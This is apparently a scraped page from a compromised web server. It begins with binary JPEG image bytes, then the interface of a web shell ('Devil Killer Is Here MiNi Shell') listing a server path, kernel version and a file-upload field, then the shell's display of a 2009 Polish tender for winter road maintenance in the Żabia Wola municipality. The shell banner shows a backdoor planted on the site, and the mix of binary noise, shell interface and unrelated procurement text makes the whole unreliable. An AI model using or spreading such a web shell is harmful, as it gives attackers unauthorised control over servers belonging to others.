JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/368436-N-2009.html

<p class="kh_header"><b>Żabia Wola: WYKONANIE ZIMOWEGO UTRZYMANIA DRÓG I ULIC STANOWIĄCYCH WŁASNOŚĆ GMINY ŻABIA WOLA W SEZONIE ZIMOWYM 2009-2010</b><br>
<b>Numer ogłoszenia: 368436 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Żabia Wola , ul. Główna 3, 96-321 Żabia Wola, woj. mazowieckie, tel. 046 8578199, faks 046 8578181.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabiawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ZIMOWEGO UTRZYMANIA DRÓG I ULIC STANOWIĄCYCH WŁASNOŚĆ GMINY ŻABIA WOLA W SEZONIE ZIMOWYM 2009-2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  usługa polegająca na  oczyszczaniu dróg i ulic ze śniegu, lodu, błota, zapobieganie i likwidacja śliskości zimowej, monitorowanie i kontrolowanie stanu nawierzchni dróg i ulic oraz jednokrotne oczyszczenie dróg po okresie zimowym,  stanowiących własność gminy Żabia Wola. Ponad 50% dróg stanowią drogi o nawierzchni gruntowej i szerokości około 2,5  m, pozostałe o nawierzchni bitumicznej, z destruktu, z powierzchniowym utrwaleniem emulsją asfaltową i asfaltowe. 
Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg ( zał. nr 8).
Część I.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część II.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część III.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część IV.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część V.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część VI.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część VII.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część VIII.	Odśnieżanie i zwalczanie śliskości dróg według  I i II kolejności. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ

JEDEN WYKONAWCA MOŻE ZŁOŻYĆ OFERTĘ MAKSYMALNIE NA 2 CZĘŚCI ZAMÓWIENIA.

Teren gminy został podzielony na obszary, które określają zasięg działania wykonawców. 

UWAGA! 
Przystąpienie do usuwania zjawisk na drogach dla części VIII:
	dla I kolejności odśnieżania w ciągu 2 godzin, śliskości 1,5 godziny od wystąpienia zjawisk po telefonicznym uzgodnieniu z Zamawiającym.
	dla II kolejności odśnieżania po telefonicznym uzgodnieniu z Zamawiającym. 
Dla pozostałych części tj. I do VII Wykonawcy przystąpią do usuwania zjawisk po telefonicznym uzgodnieniu z Zamawiającym. 

Przy opracowaniu oferty należy wziąć pod uwagę fakt, że Zamawiający nie przewiduje zapłaty za gotowość, a tylko za efektywną pracę. 

ZAKRES USŁUGI:

1)	Okres zimowego utrzymania zimowego dróg ustala się od dnia podpisania umowy do 30 kwietnia 2010 r. w tym czasie wykonawca zobowiązany jest do prowadzenia zimowego utrzymania dróg, które oprócz akcji czynnej obejmuje również prowadzenie dyżurów dyspozytorskich. 
2)	Rozpoczęcie i zakończenie utrzymania zimowego będzie uzależnione od warunków atmosferycznych i następuje na wyraźne polecenie Zamawiającego. 
3)	Upoważniony przedstawiciel Zamawiającego może zawiesić prowadzenia akcji zimowej, a także dokonać odwołania zawieszenia.
4)	Rozpoczęcie pracy sprzętu winno nastąpić nie później niż 2 godziny od momentu wystąpienia zjawiska lub zgłoszenia interwencji dotyczących utrudnień w ruchu na drodze 
5)	Wykonawca w czasie prowadzenia utrzymania zimowego dróg przyjmuje interwencje, oraz wykonuje prace związane z usunięciem przyczyn zgłaszanych interwencji i pełni dyżur dyspozytorski.
6)	Na drogach objętych zimowym utrzymaniem mogą wystąpić utrudnienia i krótkotrwałe (2 godz.) przerwy w ruchu. Czas trwania utrudnień uzależniony jest od stanu zjawiska i czasu jego trwania. W przypadku skrajnie niekorzystnych warunków atmosferycznych i pogodowych /zawieje, zamiecie śnieżne, długotrwałe burze śnieżne niweczące efekty odśnieżania dróg/ uniemożliwiających osiągnięcie i utrzymanie na drogach standardu docelowego, przejezdności, organizacje pracy wtedy należy dostosować do aktualnych zmieniających się warunków na drogach i przyjmować niekonwencjonalne rozwiązania.
7)	Termin zakończenia prac związanych z poziomym oczyszczeniem ulic i mostów z materiałów po zimowym utrzymaniu dróg ustala się do końca kwietnia .
8)	Poziome oczyszczanie dróg z materiałów po zimowym utrzymaniu dróg obejmuje oczyszczanie jezdni w miejscu występowania chodników wraz z nimi, oraz obiektów mostowych.
9)	Po rozpoczęciu zimowego utrzymania dróg Wykonawca jest zobowiązany do całodobowego pełnienia dyżurów przy uwzględnieniu następujących warunków;
a)	dostępność telefoniczna 
b)	każda jednostka sprzętowa jest wyposażona  w telefon komórkowy
c)	prowadzenia dokumentacji dyżurów i pracy sprzętu 
d)	składania telefonicznych meldunków o stanie dróg Zamawiającemu
e)	prowadzenia zimowego utrzymania dróg zgodnie zobowiązującymi standardami zimowego utrzymania dróg ( zał. nr 8)
10)	wykonawca w czasie zimowego utrzymania prowadzi akcję czynną i pełni dyżur dyspozytorski
11)	potwierdzenie wykonania akcji czynnej wykonawcy przez przedstawiciela Zamawiającego - Sołtysa wsi winno nastąpić niepóźnej w dniu następnym 
12)	odśnieżanie dróg
a)	Odśnieżanie dróg ma na celu usunięcie śniegu z jezdni i poboczy dróg.
b)	W zależności od zalegającego śniegu na jezdni jej nawierzchni i szerokości należy używać odpowiednich pługów lub zespołu pługów. Droga winna być odśnieżana na bieżąco w trakcie  opadów śniegu tak, aby na nawierzchni nie zalegała większa warstwa śniegu niż 15 cm. 
c)	W przypadku skrajnie niekorzystnych warunków atmosferycznych i pogodowych (zawieje, zamiecie śnieżne) dopuszczalne jest odstępstwo od utrzymania w standardzie zgodnie z przyjętymi zasadami przy odśnieżaniu i zwalczaniu gołoledzi.
d)	W trudnych warunkach atmosferycznych należy odśnieżać tylko jeden pas ruchu i wykonać mijanki z zasięgu widoczności 200-300 m
e)	Odśnieżanie mostów odbywa się jednocześnie podczas prac na danym ciągu drogowym.
f)	Śnieg zalegający jezdnię jest spychany na krawędź jezdni i chodnika. Należy zachować na chodniku przejście dla pieszych min. 0.7 m. place parkingowe odśnieża się po zakończeniu prac związanych z odśnieżaniem jezdni głównych lub jednocześnie, jeśli warunki pogodowe na to pozwalają.
g)	Przy odśnieżaniu dróg prace należy wykonać tak aby śnieg usuwany z drogi nie był przemieszczany na inne krzyżujące się drogi jak i zjazdy. W przypadku utworzenia się wału na krawędzi drogi jak i zjazdu należy usunąć zalegający śnieg. Zjazdy do posesji odśnieżają we własnym zakresie właściciele posesji. Wjazdy na drogi prostopadłe do drogi objętej zimowym utrzymaniem  - Wykonawca prowadzący akcję odśnieżania. 
h)	Zimowe utrzymanie chodników zgodnie z regulaminem Utrzymania Czystości i Porządku w Gminie zatwierdzonym uchwałą  nr25/V/2007 z 29.03.2007 należy do właścicieli nieruchomości położonych wzdłuż chodników.  
13)	Zwalczanie śliskości dróg
a)	Do zapobiegania powstawania, likwidacji i łagodzenia śliskości zimowej stosuje się materiały uszorstniające.
b)	rozsypanie środków uszorstniających z domieszką sodu NACL w ilości 3-4 % wagowych z uwzględnieniem ppkt i
c)	Zapobieganie powstawania gołoledzi i szronu - Działalność należy rozpocząć po stwierdzeniu, że temperatura nawierzchni jest ujemna, a względna wilgotność powietrza osiągnęła 85 % i dalej wzrasta.
d)	Likwidowanie świeżego opadu śniegu - Świeży opad śniegu należy usuwać wyłącznie mechanicznie.
e)	Likwidowanie grubych warstw lodu , zlodowaciałego lub zbitego śniegu - Warstwy takie powinny być usuwane z nawierzchni mechanicznie. Warstwy tego typu mogą być również oszronione.
f)	Do rozsypywania materiałów uszorstniających należy używać urządzeń dających gwarancję użycia materiałów w ilości 50-150 g/m2
g)	Rozsypywarki środków chemicznych i materiałów uszorstniających muszą być łatwe w montażu i demontażu na środki transportowe, zapewnić płynną regulację rozsypywanych środków do zwalczania śliskości zimowej, równomierny wydatek na m2 bez względu na prędkość jazdy rozsypywarki.
h)	Talerz lub talerze rozsypujące muszą być usytuowane na odpowiedniej wysokości aby rozsypywany materiał nie powodował uszkodzeń karoserii pojazdów będących w ruchu.
i)	Zabrania się stosowania wszelkich mieszanek zawierających sól do usuwania śliskości na niżej wymienionych drogach o nawierzchni bitumicznej:
a.	m. Nowa Bukówka ul. Rumiankowa 
b.	m. Rumianka ul. Owocowa, ul. Orzechowa
c.	m. Ojrzanów ul. Kresowa
d.	m. Oddział Al. Lipowa,
e.	m. Grzegorzewice, ul. Daleka, ul. Słoneczna, ul. Pałacowa
f.	m. Żelechów ul. Krakowiańska, ul. Nad Lasem
g.	m. Kaleń- Pieńki Zarębskie ul. Jaśminowa
h.	m Osowiec ul Dworska, Parkowa, Falista
i.	m Słubica ul. Słoneczna, ul. Kukułki
j.	m. Zaręby ul. Zięby
k.	m. Skuły ul. Północna
l.	m. Jastrzębnik ul. Ziołowa- Mazowieckie Pola
m.	m. Józefina ul. Gałązki
n.	m. Władysławów ul. Na Skarpie, ul. Ku Rzece
o.	m. Kaleń-Ciepłe ul. Makowa
p.	m. Bieniewiec ul. Zagrodowa
q.	m. Ciepłe-Kaleń ul. Makowa
r.	m. Pieńki Słubickie ul. Kukułki
s.	m. Słubica A ul. Graniczna
Na przedmiotowych drogach do usuwania śliskości należy stosować materiały uszorstniające (piasek) bez domieszki soli.
j)	Materiał do posypywania nawierzchni zapewnia Wykonawca.

3)	Wymagania stawiane Wykonawcy:
a.	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.  
b.	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
c.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy 
d.	Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
e.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
4)	Podwykonawcy.
W przypadku realizacji przez Wykonawcę przedmiotu zamówienia w powierzonej części przez podwykonawców - Wykonawca przyjmuje, że wszelkie zobowiązania oraz odpowiedzialność za nieprawidłowe lub wadliwe  wykonanie przedmiotu zamówienia przez podwykonawcę - stanowi odpowiedzialność Wykonawcy. 
Wykonawca jest zobowiązany wskazać w swojej ofercie część zamówienia, jaką zamierza powierzyć podwykonawcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.	O udział w postępowaniu mogą ubiegać się Wykonawcy, którzy:
1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.
	dysponują doświadczeniem zawodowym rozumianym jako zrealizowane w ciągu ostatnich 5 lat co najmniej jedno podobne zamówienie. Za podobne zamówienie uznaje się wykonanie usługi zimowego utrzymania dróg i ulic o wartości min. 10.000 zł brutto
	dysponują co najmniej 1 osobą posiadającą odpowiednią kategorię prawa jazdy (zał. nr 9) 
	dysponują niezbędnym sprzętem do wykonania zamówienia, co najmniej następującymi jednostkami sprzętu spośród wymienionych:
w zakresie usuwania śliskości: 	pługo-piaskarka lub pługo-solarka lub pojazd do jednoczesnego usuwania śniegu i zwalczania śliskości
     w zakresie odśnieżania dróg w zależności od grubości zalegającego śniegu: 
pług lemieszowy lekki, średni lub ciężki
lub równiarki różnych typów z zamontowanym pługiem czołowym jedno lub dwustronnym
pług wirnikowy
spychacz, ładowarka o pojemności łyżki większej niż 2m3  ( zał. nr 10)
       3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia i w tym względzie:
	posiadają ubezpieczenie potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie obejmującym zakres przedmiotu zamówienia,
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

II.	Z ubiegania się o zamówienia publicznego wyklucza się Wykonawców, którzy:
1.	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.	podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
3.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
4.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
5.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
6.	nie zgodzili się na przedłużenie okresu związania ofertą. 

III.	Zamawiający odrzuca ofertę jeżeli:

1.	jest niezgodna z ustawą ,
2.	jej treść nie odpowiada treści Specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3 Prawa zamówień publicznych,
3.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji ,
4.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
5.	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6.	zawiera błędy w obliczeniu ceny,
7.	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Prawa zamówień publicznych,
8.	jest nieważna na podstawie odrębnych przepisów. 

IV.	Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.

Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych oświadczeń i dokumentów przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty i oświadczenia:
1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - w formie kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem, (oryginał do wglądu w dniu podpisywania umowy), wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)	Dokumenty potwierdzające posiadanie uprawnień /pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
3)	Wypełniony formularz ofertowy (załącznik nr 1) i kosztorysy ofertowe ( załączniki nr 1a-1h) - jeden  Wykonawca maksymalnie dla 2 części zamówienia dla których składana jest oferta.
4)	Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ustawy według wzoru ustalonego w załączniku nr 2. 
5)	Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy według wzoru ustalonego w załączniku nr 3.
6)	Wykaz wykonanych robót wykonanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz terminu realizacji oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane z należytą starannością według wzoru ustalonego w załączniku nr 4 .
7)	Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie obejmującym zakres przedmiotu zamówienia w formie kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem.

A. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:  A.1) Zamiast dokumentu, o którym mowa w pkt. 1), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
-Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. A zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. A. 

B. Dokumenty wymagane w przypadku składania oferty wspólnej:
B.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania i zawarcia umowy.
B.2 Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. 1, 4 i 5 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.
C. Postanowienia dotyczące składanych dokumentów. C.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. C.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
 C.3 Zamawiający informuje, iż zgodnie z art. 96 ust. 3 ustawy Prawo zamówień publicznych oferty składane w postępowaniu o zamówienie publiczne są jawne i podlegają udostępnieniu od chwili ich otwarcia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zabiawola.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żabia Wola, ul. Główna 3, 96-321 Żabia Wola, pok. nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2009 godzina 10:00, miejsce: Urząd Gminy Żabia Wola, ul. Główna 3, 96-321 Żabia Wola, pok. nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
